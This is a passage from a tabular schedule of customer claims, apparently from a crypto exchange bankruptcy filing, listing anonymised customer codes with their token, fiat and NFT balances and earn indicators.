| 07334060 | | BRZ[1], CUSDT[8], DOGE[89.1324784], SHIB[1], TRX[3], USD[0.00] | | |
| 07334061 | | USD[10.00] | | |
| 07334062 | | CUSDT[1], ETH[.00582555], ETHW[.00582555], TRX[1], USD[0.00] | | |
| 07334063 | | ETH[.00000818], ETHW[.00000818], USD[0.00] | Yes | |
| 07334064 | | USD[10.00] | | |
| 07334065 | | USD[10.00] | | |
| 07334066 | | USD[10.00] | | |
| 07334067 | | USD[2.42] | | |
| 07334068 | | USD[10.00] | | |
| 07334069 | | DOGE[.10426214], USD[0.00] | Yes | |
| 07334070 | | DOGE[64.84961564], USD[0.05] | Yes | |
| 07334071 | | USD[10.00] | | |
| 07334072 | | USD[10.00] | | |
| 07334073 | | USD[10.00] | | |
| 07334074 | | BRZ[2], CUSDT[5], DOGE[1], SHIB[199.08987485], TRX[7], USD[0.00], USDT[1.08128016] | Yes | |
| 07334075 | | USD[10.00] | | |
| 07334076 | | USD[0.00] | | |
| 07334077 | | USD[10.00] | | |
| 07334078 | | USD[10.00] | | |
| 07334079 | | USD[10.00] | | |
| 07334080 | | LINK[.0892], USD[0.72], USDT[.0780753] | | |
| 07334081 | | USD[0.00], USDT[0] | | |
| 07334082 | | BTC[.00000001], USD[0.00] | | |
| 07334083 | | USD[10.00] | | |
| 07334084 | | USD[10.00] | | |
| 07334085 | | DOGE[570.92429694], ETH[.66298786], ETHW[0.25882270], LINK[3.75699196], TRX[1257.4933672], UNI[4.44257868], USD[0.00] | Yes | |
| 07334087 | | USD[10.00] | | |
| 07334088 | | BAT[0], BCH[0], BRZ[0], BTC[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], MATIC[0.09115568], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07334089 | | CUSDT[8], DOGE[1376.01550082], USD[0.00] | | |
| 07334090 | | BTC[.00052582], CUSDT[2], DOGE[.32083016], ETH[.00953955], ETHW[.00941643], USD[0.00] | Yes | |
| 07334091 | | BTC[.1303695], ETH[1.433388], ETHW[1.433388], GRT[110.889], LINK[9.987], MATIC[9.74], SHIB[7391300], SOL[3.2588], SUSHI[25.959], TRX[1099.404], UNI[10.984], USD[2.99], YFI[.000993] | | |
| 07334092 | | BTC[0], DOGE[0], LTC[0], SOL[0], TRX[0], USD[0.04], USDT[0] | | |
| 07334094 | | CUSDT[1], DOGE[1267.51247299], SHIB[145391.10206455], SOL[1.04411042], USD[0.00] | | |
| 07334095 | | CUSDT[3], DOGE[2], TRX[2], USD[0.00] | | |
| 07334096 | | DOGE[.53491752], GRT[2], TRX[2], USD[0.35] | | |
| 07334097 | | TRX[105.6151168], USD[0.00] | | |
| 07334098 | | CUSDT[1], USD[0.07] | | |
| 07334099 | | BAT[0], CUSDT[1], DOGE[1], GRT[1.00149878], LTC[0], MKR[0], SHIB[0], SOL[0], TRX[2], USD[0.01], YFI[0] | Yes | |
| 07334100 | | CUSDT[1], DOGE[2276.15079485], TRX[1], USD[1.25] | | |
| 07334101 | | USD[10.00] | | |
| 07334102 | | CUSDT[1], DOGE[49.62696406], USD[0.06] | | |
| 07334103 | | CUSDT[1], DOGE[235.97037369], USD[0.00] | | |
| 07334104 | | USD[10.00] | | |
| 07334105 | | USD[10.00] | | |
| 07334106 | | USD[10.00] | | |
| 07334108 | | BRZ[2], CUSDT[16], DOGE[4], ETH[.00000001], LINK[.00000001], SHIB[5], TRX[2.000001], USD[0.00], USDT[0.00000001] | | |
| 07334109 | | USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07334110 | | BAT[1], BRZ[2], CUSDT[4], DOGE[18.32948678], TRX[5], USD[0.00], USDT[0] | | |
| 07334111 | | USD[10.00] | | |
| 07334112 | | AUD[1.28], BAT[5.31223938], BCH[.00110635], BTC[.00029695], CUSDT[1], DOGE[635.20091357], ETH[.032023], ETHW[.03162628], GRT[.5866884], LINK[.02783915], LTC[.00378911], SOL[1.989225471, SUSHI[.16096655], TRX[276.8358666], UNI[.03159675], USD[4.38], YFI[.00002752] | Yes | |
| 07334113 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07334114 | | TRX[1], USD[0.01] | | |
| 07334115 | | USD[10.00] | | |
| 07334116 | | BRZ[2], CUSDT[7], SOL[.43666756], TRX[2], USD[17.87] | Yes | |
| 07334117 | | USD[10.00] | | |
| 07334118 | | USD[10.00] | | |
| 07334119 | | DOGE[1.00958672], USD[0.00] | | |
| 07334120 | | USD[10.00] | | |
| 07334122 | | USD[10.00] | | |
| 07334123 | | USD[10.00] | | |
| 07334124 | | BTC[.00000202], DOGE[3.14265731], USD[0.00], USDT[0.00000001] | | |
| 07334125 | | USD[10.00] | | |
| 07334126 | | DOGE[2533.02494598], TRX[1], USD[10.00] | | |
| 07334127 | | CUSDT[2], DOGE[1], USD[0.01] | Yes | |
| 07334128 | | CUSDT[1], USD[0.08] | | |
| 07334129 | | TRX[1], USD[0.00] | Yes | |
| 07334130 | | TRX[69.63142416], USD[0.00] | | |
| 07334131 | | USD[10.00] | | |
| 07334132 | | USD[10.00] | | |
| 07334133 | | CUSDT[1], USD[0.00] | | |
| 07334134 | | BTC[.00751288], CUSDT[1], DOGE[4634.1311259], ETH[.12095415], ETHW[.12095415], TRX[2], USD[0.00] | | |
| 07334135 | | USD[10.00] | | |
| 07334136 | | TRX[1], USD[43.29] | | |
| 07334138 | | BRZ[1], CUSDT[6], DOGE[6621.68220531], NFT [354489056723448570/Rare Art #25][1], NFT [528697670883304425/CatFamilya #53][1], SHIB[1], TRX[1], USD[0.00] | | |
| 07334139 | | BRZ[3], CUSDT[8], DOGE[1612.47797137], GRT[.00002438], TRX[3.00006043], USD[0.00] | | |
| 07334140 | | CUSDT[6], DOGE[4610.99049547], TRX[1], USD[0.00] | | |
| 07334141 | | DOGE[2.00788898], USD[10.90] | | |
| 07334142 | | USD[10.00] | | |
| 07334143 | | CUSDT[1], DOGE[0], ETH[0], TRX[1], USD[0.00] | | |
| 07334144 | | BAT[38.53936826], BCH[.00573974], BTC[.00031011], CUSDT[68.38887608], DOGE[51.6687463], ETH[.00980929], ETHW[.00968617], LINK[.10746846], LTC[.01955624], MATIC[14.32902913], SOL[.59692778], SUSHI[.00000091], TRX[34.164974Z], UNI[.05414056], USD[0.00] | Yes | |
| 07334146 | | CUSDT[4], GRT[1.00498957], USD[0.00] | Yes | |
| 07334147 | | USD[10.00] | | |
| 07334148 | | BTC[.00017817], USD[0.00] | | |
| 07334149 | | DOGE[.00618208], USD[0.00] | | |
| 07334150 | | USD[10.00] | | |
| 07334151 | | USD[10.00] | | |
| 07334152 | | BTC[.00019153], CUSDT[2], USD[0.01], USDT[1] | | |
| 07334153 | | CUSDT[1], TRX[1], USD[0.01] | | |
| 07334154 | | USD[10.00] | | |
| 07334155 | | DOGE[3409.64435486], SHIB[100394.7090595], TRX[1], USD[0.00] | | |
| 07334156 | | DOGE[2], USD[0.01] | | |
| 07334158 | | BTC[0], USD[64.18] | | |
| 07334159 | | BTC[.000195], USD[0.00] | | |
| 07334160 | | BRZ[1], CUSDT[2], DOGE[492.84322267], TRX[2], USD[10.00], USDT[0.00071077] | | |
| 07334161 | | BRZ[1], USD[0.01] | | |
| 07334162 | | USD[0.72] | | |
| 07334164 | | BRZ[1], TRX[2], USD[0.05] | | |
| 07334165 | | USD[10.00] | | |
| 07334166 | | BAT[1.01655549], BRZ[1], CUSDT[17], DOGE[11.78606131], GRT[.00209734], LTC[.00001903], TRX[4], USD[0.00] | Yes | |
| 07334167 | | BRZ[1], CUSDT[3], DOGE[39058.22547383], TRX[3684.93251056], USD[0.00] | Yes | |
| 07334168 | | DOGE[12665.12472994], USD[10.00], USDT[1] | | |
| 07334169 | | BTC[0], DOGE[2], ETH[0.00552295], ETHW[0.00552295], USD[0.00] | | |
| 07334170 | | CUSDT[3], USD[0.00] | | |
| 07334171 | | USD[0.00] | | |
| 07334172 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07334173 | | LTC[5.17902567], SHIB[1], USD[0.00], USDT[0] | Yes | |
| 07334174 | | DOGE[13970.36843505], LTC[35.62595545], TRX[1], USD[10.00] | | |
| 07334175 | | BRZ[2], CUSDT[28], DOGE[66], ETH[0], ETHW[0], TRX[15], USD[0.00], USDT[1] | | |
| 07334176 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07334177 | | USD[10.00] | | |
| 07334178 | | CUSDT[6], DOGE[67.97664442], TRX[3], USD[0.01] | | |
| 07334179 | | USD[10.00] | | |
| 07334180 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07334181 | | USD[10.00] | | |
| 07334182 | | CUSDT[1], NFT (289318399858876725/Polka  Dino 1)[1], NFT (300681367762884954/Kobe )[1], NFT (308194169254767160/I got it )[1], NFT (313158508935042511/Original prints  #4)[1], NFT (327463140409184347/James Harden Drawing #2)[1], NFT (428157650394449211/Fly by )[1], NFT (452529778516345987/ Lukaku)[1], NFT (470495137832485280/70 Chevelle )[1], NFT (492971213509824128/Only real gamers )[1], NFT (507820788051178551/Balling )[1], NFT (510168783723528022/King James )[1], NFT (515886807748205754/Showing off )[1], NFT (537315914164450265/Shelly 4)[1], USD[2.46] | Yes | |
| 07334183 | | USD[10.00] | | |
| 07334184 | | USD[10.00] | | |
| 07334186 | | USD[10.00] | | |
| 07334187 | | DOGE[.01759533], USD[0.00] | | |
| 07334188 | | USD[0.01] | Yes | |
| 07334189 | | CUSDT[6], DOGE[533.49069931], ETH[.60654124], ETHW[.60654124], TRX[6], USD[0.00] | | |
| 07334192 | | USD[10.00] | | |
| 07334193 | | BCH[0], BRZ[0], BTC[0], CUSDT[0], DOGE[0.00001581], ETH[0], GRT[0], LINK[0], LTC[0], PAXG[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0], YFI[0] | | |
| 07334194 | | DOGE[3091.28715959], USD[0.00] | | |
| 07334195 | | TRX[1], USD[0.00] | | |
| 07334196 | | USD[10.00] | | |
| 07334197 | | USD[10.00] | | |
| 07334198 | | CUSDT[1], DOGE[1309.93786056], TRX[1], USD[98.30] | | |
| 07334199 | | BRZ[1], TRX[1], USD[0.00], USDT[1] | | |
| 07334200 | | USD[10.00] | | |
| 07334201 | | DAI[.00001397], ETH[0], USD[10.00] | | |
| 07334202 | | USD[10.00] | | |
| 07334203 | | DOGE[2909.6119929], USD[10.00] | | |
| 07334204 | | DOGE[2.89223424], USD[0.00] | | |
| 07334205 | | USD[10.00] | | |
| 07334206 | | BTC[0.01219301], CUSDT[16], DOGE[814.37474472], ETH[0], ETHW[0], LINK[.00009193], MATIC[482.605933333], NFT (297622151945309881/Bahrain Ticket Stub #472)[1], SHIB[6875842.95718496], SOL[3.05389329], TRX[6], UNI[0], USD[0.00] | Yes | |
| 07334207 | | DOGE[1967.61133034], TRX[1], USD[0.00] | | |
| 07334208 | | USD[10.00] | | |
| 07334209 | | USD[10.00] | | |
| 07334210 | | USD[10.00] | | |
| 07334211 | | USD[10.00] | | |
| 07334212 | | USD[10.00] | | |
| 07334213 | | DOGE[1.01085223], USD[0.00] | | |
| 07334214 | | USD[10.00] | | |
| 07334215 | | USD[10.00] | | |
| 07334216 | | USD[10.00] | | |
| 07334217 | | USD[10.00] | | |
| 07334218 | | USD[10.00] | | |
| 07334219 | | DOGE[1145.24952913], SHIB[2], USD[0.45], USDT[0] | | |
| 07334222 | | USD[10.00] | | |
| 07334222 | | BAT[569.36693906], BRZ[2], CUSDT[8], DOGE[.98769744], ETH[.16445161], ETHW[.16404661], GRT[198.86045254], KSHIB[3964.76225038], LINK[3.58324965], LTC[.52253072], SHIB[8076546.3757319], SOL[25.29066878], SUSHI[28.59190968], TRX[3], USD[42.14] | Yes | |
| 07334223 | | DOGE[26.74080429], USD[0.00] | | |
| 07334224 | | USD[0.64] | | |
| 07334226 | | USD[10.00] | | |
| 07334227 | | BAT[1.0165555], BRZ[2], CUSDT[3], TRX[2], USD[0.01] | Yes | |
| 07334228 | | USD[0.00] | | |
| 07334229 | | USD[10.00] | | |
| 07334231 | | BTC[0], SOL[0], USD[0.00] | Yes | |
| 07334232 | | BAT[1], CUSDT[5], USD[0.01] | | |
| 07334233 | | USD[10.00] | | |
| 07334234 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07334235 | | USD[10.00] | | |
| 07334236 | | BRZ[1], CUSDT[1], USD[10.00] | | |
| 07334237 | | USD[10.00] | | |
| 07334238 | | CUSDT[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07334239 | | BTC[.02601577], CUSDT[58.8168505], DOGE[7473.0375273], ETH[.19808481], ETHW[.19787304], LTC[.96674929], TRX[1], USD[0.00], YFI[.00110545] | Yes | |
| 07334240 | | USD[10.00] | | |
| 07334241 | | USD[10.00] | | |
| 07334242 | | DOGE[0], ETH[0], SHIB[25514.75415792], USD[0.01] | | |
| 07334243 | | CUSDT[4], DOGE[43.00099559], USD[0.00] | | |
| 07334244 | | CUSDT[22], DOGE[1], TRX[4], USD[0.00] | | |
| 07334245 | | USD[10.00] | | |
| 07334246 | | BRZ[1], CUSDT[2], TRX[3], USD[10.00], USDT[1] | | |
| 07334247 | | CUSDT[1], DOGE[660.17769215], ETH[0.00802043], ETHW[0.00802043], LTC[0.13372977], USD[0.00] | | |
| 07334248 | | DOGE[.00009119], TRX[4], USD[0.00] | | |
| 07334250 | | BAT[1], CUSDT[1], TRX[1], USD[0.35] | Yes | |
| 07334251 | | USD[0.06] | | |
| 07334252 | | DOGE[1], GRT[1], TRX[2], USD[175.97] | | |
| 07334253 | | USD[10.00] | | |
| 07334254 | | USD[10.00] | | |
| 07334255 | | USD[10.00] | | |
| 07334256 | | DOGE[1], TRX[2], USD[0.00] | | |
| 07334257 | | BF_POINT[300], USD[1.22], USDT[0] | Yes | |
| 07334259 | | GRT[.00000001], LINK[0], SOL[0.00000025], USD[0.00] | Yes | |
| 07334260 | | DOGE[1.0004738], LINK[.00001336], TRX[2], USD[0.01] | | |
| 07334261 | | CUSDT[8], TRX[1], USD[0.00] | | |
| 07334263 | | DOGE[0], ETH[0], LINK[0], SHIB[10.13383152], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07334264 | | BRZ[1], CUSDT[8], DOGE[0.28682626], ETH[0], GRT[0.87798344], LINK[0], SOL[0], SUSHI[.00015919], TRX[6], UNI[0.00945743], USD[42.61] | Yes | |
| 07334265 | | TRX[.000543], USD[20073.18], USDT[.006789] | | |
| 07334266 | | USD[10.00] | | |
| 07334267 | | CUSDT[1], TRX[174.58249904], USD[0.00] | | |
| 07334268 | | CUSDT[1], DOGE[716.95304399], SHIB[4583525.49084138], TRX[5.31365486], USD[0.00] | Yes | |
| 07334269 | | CUSDT[1], DOGE[5752.74115043], USD[0.00] | | |
| 07334271 | | CUSDT[1], DOGE[7454.44219592], TRX[.64249835], USD[0.00] | | |
| 07334272 | | DOGE[133.54654484], USD[0.00] | | |
| 07334273 | | USD[0.01] | | |
| 07334274 | | USD[10.00] | | |
| 07334275 | | CUSDT[1], TRX[18.66574823], USD[0.00] | | |
| 07334277 | | USD[10.00] | | |
| 07334278 | | DOGE[1], USD[0.00] | | |
| 07334279 | | DOGE[0.46889664], ETH[.016983], ETHW[.016983], USD[0.31], USDT[0.00007924] | | |
| 07334281 | | BRZ[1], BTC[0.00000254], CUSDT[3], DOGE[0.09447205], USD[0.00] | Yes | |
| 07334282 | | USD[10.00] | | |
| 07334283 | | CUSDT[1], DOGE[0], SUSHI[0], TRX[0], USD[0.01] | Yes | |
| 07334284 | | USD[10.00] | | |
| 07334285 | | TRX[1], USD[0.01] | Yes | |
| 07334286 | | DOGE[76.67749853], USD[0.00] | | |
| 07334287 | | ETH[.00506514], ETHW[.00506514], USD[0.00] | | |
| 07334288 | | USD[10.00] | | |
| 07334289 | | DOGE[286.76663733], USD[10.00] | | |
| 07334290 | | USD[10.00] | | |
| 07334291 | | DOGE[1.26316921], TRX[3], USD[0.01] | | |
| 07334292 | | USD[10.00] | | |
| 07334293 | | USD[0.01] | | |
| 07334294 | | BAT[2], BRZ[3], CUSDT[6], DOGE[2946.44271789], GRT[1], LINK[1], TRX[9], UNI[1], USD[0.00], USDT[2] | | |
| 07334295 | | USD[10.00] | | |
| 07334296 | | BTC[0], CUSDT[5], DOGE[0], SHIB[2667824.68808535], SUSHI[32.83909843], USD[0.00] | Yes | |
| 07334297 | | USD[10.00] | | |
| 07334298 | | BCH[0], BTC[0], DOGE[0], LINK[0], LTC[0], SHIB[3], SOL[0], TRX[0], USD[0.00], USDT[0] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07334300 | | USD[10.00] | | |
| 07334301 | | USD[10.00] | | |
| 07334302 | | DOGE[1], USD[0.00] | | |
| 07334303 | | CUSDT[2], GRT[.00003433], SOL[.00003577], USD[0.00], USDT[0] | | |
| 07334304 | | DOGE[0], GRT[0], UNI[0], USD[0.00] | | |
| 07334305 | | BRZ[1], CUSDT[8], DOGE[1175.89355067], TRX[1], USD[0.00] | | |
| 07334306 | | BAT[0], BRZ[6], CUSDT[10], DOGE[2322.57468967], NFT (347906385805650784/Horse)[1], SHIB[3894384.76504261], SOL[3.00841025], TRX[10], USD[0.00], USDT[0.50000000] | | |
| 07334307 | | DOGE[21.26384889], USD[0.00] | Yes | |
| 07334308 | | USD[10.00] | | |
| 07334309 | | DOGE[182.36983398], USD[0.00] | | |
| 07334310 | | USD[10.00] | | |
| 07334311 | | DOGE[13802.21155338], USD[0.00], USDT[0.00000001] | Yes | |
| 07334312 | | BCH[0], CUSDT[6], DOGE[1], ETH[.00000067], ETHW[.00000067], TRX[1], USD[7.14] | Yes | |
| 07334313 | | ETH[.0032955], ETHW[.00325446], USD[0.14] | Yes | |
| 07334314 | | USD[10.00] | | |
| 07334315 | | BTC[0], ETH[0], ETHW[0], USD[0.00], USDT[0] | Yes | |
| 07334317 | | USD[10.00] | | |
| 07334319 | | BTC[0], DOGE[0], LINK[0], LTC[0], USD[0.02] | | |
| 07334321 | | USD[10.00] | | |
| 07334322 | | DOGE[.04683578], USD[0.00] | | |
| 07334324 | | USD[10.00] | | |
| 07334325 | | USD[10.00] | | |
| 07334326 | | BTC[.00017616], DOGE[1], USD[0.00] | | |
| 07334327 | | USD[10.00] | | |
| 07334328 | | USD[10.00] | | |
| 07334329 | | BTC[.00017589], TRX[1], USD[0.00] | | |
| 07334330 | | USD[10.00] | | |
| 07334331 | | BRZ[3], CUSDT[8], DOGE[5], GRT[3.81098482], SHIB[2], USD[0.00], USDT[0] | | |
| 07334332 | | TRX[154.19782161], USD[0.00] | | |
| 07334333 | | USD[10.00] | | |
| 07334334 | | USD[10.00] | | |
| 07334335 | | BAT[1], BRZ[1], CUSDT[4], TRX[5], USD[0.00], USDT[1] | | |
| 07334336 | | BTC[0], CUSDT[5], DOGE[2], TRX[3], USD[0.00], USDT[1] | | |
| 07334337 | | USD[10.00] | | |
| 07334338 | | USD[10.00] | | |
| 07334339 | | BRZ[1], CUSDT[1], TRX[3], USD[0.01], USDT[1] | | |
| 07334340 | | BCH[.01816896], DOGE[35.5587753], USD[6.18] | Yes | |
| 07334341 | | BTC[.00119761], CUSDT[3], DOGE[448.73047658], TRX[2], USD[0.00] | Yes | |
| 07334342 | | CUSDT[1], GRT[231.88306222], USD[0.00] | Yes | |
| 07334343 | | DOGE[51.87526219], USD[0.00] | | |
| 07334344 | | USD[164.07] | Yes | |
| 07334345 | | USD[10.00] | | |
| 07334346 | | USD[10.00] | | |
| 07334347 | | BAT[1], BF_POINT[100], DOGE[7578.21774017], TRX[1], USD[401.76] | | |
| 07334348 | | USD[10.00] | | |
| 07334349 | | USD[0.01] | Yes | |
| 07334350 | | BAT[1], CUSDT[2], GRT[1], USD[135.38] | | |
| 07334351 | | BRZ[7.45078926], CUSDT[4], TRX[158.03880776], USD[0.01] | | |
| 07334352 | | USD[10.00] | | |
| 07334353 | | BRZ[0], DOGE[0], ETH[0], USD[0.00] | | |
| 07334355 | | BTC[0.00002300], DOGE[0], LTC[0.00556015], SOL[0], USD[0.56], USDT[0] | | |
| 07334356 | | USD[10.00] | | |
| 07334357 | | USD[10.00] | | |
| 07334358 | | CUSDT[1], USD[54.36] | | |
| 07334359 | | DOGE[1], USD[0.00] | | |
| 07334360 | | USD[10.00] | | |
| 07334362 | | BRZ[2], DOGE[2], GRT[1], USD[0.00] | | |
| 07334363 | | USD[10.00] | | |

| Customer Code | Contingent, or Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07334364 | | USD[10.00] | | |
| 07334365 | | DOGE[168.29772405], USD[0.00] | | |
| 07334366 | | CUSDT[11], MATIC[1.09806188], SUSHI[.97548955], TRX[1], USD[0.00] | | |
| 07334367 | | USD[10.00] | | |
| 07334368 | | CUSDT[2], DOGE[13.90781474], TRX[1], USD[0.27] | Yes | |
| 07334369 | | USD[10.00] | | |
| 07334370 | | BTC[.00648488], DOGE[.00004791], ETH[.02481442], ETHW[.02450577], SOL[2.79278465], USD[0.00] | Yes | |
| 07334371 | | BAT[0], BRZ[0.00000001], BTC[0], DOGE[0], GRT[0], TRX[0], USD[0.00] | | |
| 07334372 | | BAT[2.07357056], BRZ[6.29928028], CUSDT[23], DOGE[6.03121085], ETH[.09117894], ETHW[.09012905], GRT[2.01787875], SHIB[3], SOL[0], TRX[5], USD[0.00], USDT[1.07366413] | Yes | |
| 07334373 | | CUSDT[3], DOGE[51.08690996], USD[0.00] | | |
| 07334374 | | BRZ[2], CUSDT[31], DOGE[692.46411606], ETH[.00000001], ETHW[0.10074218], LTC[0], SHIB[3620752.60214625], SOL[1.22864189], TRX[7], USD[15.58] | Yes | |
| 07334375 | | CUSDT[2], DOGE[ 90282378], SHIB[1], TRX[.87046699], USD[0.00], USDT[0] | Yes | |
| 07334376 | | USD[10.00] | | |
| 07334377 | | BRZ[1], CUSDT[1.00787447], DOGE[63.18138956], USD[0.10] | | |
| 07334378 | | BRZ[1], BTC[.00014277], CUSDT[1], DOGE[21.72548692], ETH[.00242927], ETHW[.00240191], LINK[.29526918], LTC[.02772791], MATIC[.00060225], MKR[.00208147], SHIB[1346238.16343212], TRX[1], USD[0.00] | Yes | |
| 07334379 | | DOGE[35.41157868], TRX[1], USD[0.00] | | |
| 07334380 | | USD[0.01] | Yes | |
| 07334381 | | USD[10.00] | | |
| 07334382 | | GRT[4.18965514], USD[0.00] | | |
| 07334383 | | USD[10.00] | | |
| 07334384 | | BCH[.10007838], BTC[.00145814], CUSDT[2], DOGE[743.33542911], USD[0.00] | | |
| 07334385 | | USD[10.00] | | |
| 07334386 | | USD[10.00] | | |
| 07334387 | | BRZ[1], DOGE[3], USD[0.01] | | |
| 07334389 | | USD[10.00] | | |
| 07334390 | | USD[10.00] | | |
| 07334391 | | USD[10.00] | | |
| 07334392 | | USD[10.00] | | |
| 07334393 | | CUSDT[1], DOGE[3866.70027104], TRX[1], USD[0.00] | Yes | |
| 07334394 | | USD[10.00] | | |
| 07334395 | | USD[10.00] | | |
| 07334396 | | DOGE[139.19033261], USD[0.00] | | |
| 07334397 | | CUSDT[1], DOGE[612.67234924], SUSHI[5.71522149], USD[19.38] | | |
| 07334398 | | USD[10.00] | | |
| 07334399 | | BTC[.00068364], CUSDT[3], DOGE[3], ETH[.31558462], ETHW[.31540894], TRX[193.8726175], USD[0.23] | Yes | |
| 07334400 | | CUSDT[1], DOGE[2], USD[0.01], USDT[0] | | |
| 07334401 | | BAT[1.0165555], BRZ[2], CUSDT[24], DOGE[.0000176], ETHW[1.2673815], GRT[1], TRX[447.24507463], USD[1.87] | Yes | |
| 07334402 | | DOGE[3044.71377949], TRX[78.25553717], USD[1.11] | | |
| 07334403 | | DOGE[0], TRX[1], USD[0.03] | | |
| 07334404 | | DOGE[1.83325397], ETH[0], USD[0.00] | Yes | |
| 07334405 | | USD[10.00] | | |
| 07334406 | | CUSDT[1], DOGE[.00003194], USD[0.01] | | |
| 07334407 | | USD[10.00] | | |
| 07334408 | | USD[0.00] | | |
| 07334410 | | BAT[1.01655549], CUSDT[4], GRT[1.00404471], SHIB[5707519.80964941], SOL[.00001851], SUSHI[1.10066811], TRX[2], USD[0.00] | Yes | |
| 07334411 | | USD[10.00] | | |
| 07334412 | | USD[10.00] | | |
| 07334413 | | CUSDT[1], DOGE[4389.43465218], TRX[1710.42786499], USD[3.15] | | |
| 07334414 | | CUSDT[3], DAI[1.82001134], DOGE[1632.01481628], USD[10.00] | | |
| 07334415 | | BTC[0], CUSDT[8], DOGE[105.10651728], USD[74.01] | | |
| 07334416 | | CUSDT[1], DOGE[28180.90869291], TRX[1], USD[0.00] | Yes | |
| 07334417 | | BRZ[0], DOGE[0], SUSHI[0], USD[1.65] | | |
| 07334418 | | USD[10.00] | | |
| 07334419 | | USD[0.00], USDT[0] | | |
| 07334420 | | USD[0.00] | | |
| 07334421 | | BRZ[1], CUSDT[1], DOGE[.00003139], ETH[.08453079], ETHW[.08453079], SHIB[1], SOL[1.0846935], TRX[1], USD[0.98] | | |
| 07334422 | | BRZ[1], BTC[.00639371], CUSDT[4], DOGE[208.96504246], USD[0.26], USDT[0.85443224] | | |
| 07334423 | | BF_POINT[600], BTC[.0015324], DOGE[16652.7996896], GRT[1.00013571], LINK[1349.0435814], MATIC[7060.40933871], USD[0.00], USDT[2.15888696] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07334425 | | CUSDT[6], DOGE[1], SOL[.00001558], USD[8.64] | Yes | |
| 07334426 | | USD[10.00] | | |
| 07334427 | | USD[10.00] | | |
| 07334430 | | USD[10.00] | | |
| 07334431 | | BRZ[1], CUSDT[3], DOGE[.00001854], USD[0.00] | | |
| 07334433 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07334434 | | DOGE[25.4758974], USD[0.00] | | |
| 07334435 | | BRZ[4], CUSDT[11], DOGE[771.74300371], ETH[.87146663], ETHW[.87110047], TRX[1], USD[0.01] | Yes | |
| 07334436 | | TRX[1], USD[0.01] | | |
| 07334437 | | BTC[.00009844], USD[0.00] | | |
| 07334438 | | USD[10.00] | | |
| 07334439 | Contingent, Disputed | BCH[0], BRZ[0], BTC[0], DOGE[0], ETH[0], LTC[0], USD[0.01], USDT[0] | | |
| 07334441 | | BRZ[1], CUSDT[1], USD[0.00] | | |
| 07334442 | | USD[10.00] | | |
| 07334443 | | ALGO[53.00287824], BAT[19.78442954], BF_POINT[100], BTC[.00171804], CUSDT[1], DOGE[3.00054665], ETH[2.17395469], ETHW[2.17304159], GRT[6.66063029], LINK[10.85694941], MATIC[116.80059575], SHIB[1], SOL[7.67518026], TRX[1.13579622], UNI[3.2876154], USD[0.00], USDT[0] | Yes | |
| 07334444 | | USD[10.96] | Yes | |
| 07334445 | | DOGE[7174.25440677], USD[0.00] | Yes | |
| 07334446 | | BRZ[1], CUSDT[1], TRX[1], USD[10.37] | | |
| 07334447 | | TRX[1], USD[0.01] | | |
| 07334448 | | USD[10.00] | | |
| 07334449 | | USD[10.00] | | |
| 07334450 | | DOGE[1.99268153], TRX[1], USD[0.01] | | |
| 07334451 | | USD[10.00] | | |
| 07334452 | | BRZ[1], CUSDT[1], DOGE[400.07961737], TRX[1], USD[2.15] | | |
| 07334453 | | CUSDT[1], TRX[7], USD[0.59] | | |
| 07334454 | | USD[0.00] | | |
| 07334455 | | USD[10.00] | | |
| 07334456 | | DOGE[140.69617027], USD[0.00] | | |
| 07334457 | | BRZ[2], CUSDT[3], TRX[4], USD[0.00] | | |
| 07334458 | | USD[0.00] | | |
| 07334459 | | CUSDT[5], DOGE[1477.1124194], TRX[1], USD[0.00] | | |
| 07334460 | | BTC[0], CUSDT[1], DOGE[4.86363031], USD[0.00] | | |
| 07334461 | | USD[10.00] | | |
| 07334462 | | CUSDT[2], DOGE[1], USD[0.01] | | |
| 07334463 | | USD[10.00] | | |
| 07334464 | | CUSDT[1], DOGE[2], ETH[.00570092], ETHW[.00570092], TRX[2], USD[0.00] | | |
| 07334465 | | BAT[1.01655549], BRZ[0], BTC[0], CUSDT[1], DOGE[0], ETH[0], LTC[0], TRX[1], USD[0.01], USDT[1.09867962] | Yes | |
| 07334466 | | DAI[0], DOGE[0], LTC[0], USD[0.00] | | |
| 07334467 | | USD[10.00] | | |
| 07334468 | | USD[10.00] | | |
| 07334469 | | USD[10.00] | | |
| 07334470 | | DOGE[1], USD[0.00] | | |
| 07334471 | | USD[10.00] | | |
| 07334472 | | USD[10.00] | | |
| 07334473 | | BTC[.00308585], CUSDT[3], DOGE[104.47669351], ETH[.02250803], ETHW[.02223135], USD[11.02] | Yes | |
| 07334474 | | USD[10.00] | | |
| 07334475 | | USD[10.00] | | |
| 07334476 | | BRZ[0], CUSDT[13], DOGE[1], TRX[5], USD[0.03], USDT[0] | Yes | |
| 07334478 | | DOGE[217.52249101] | | |
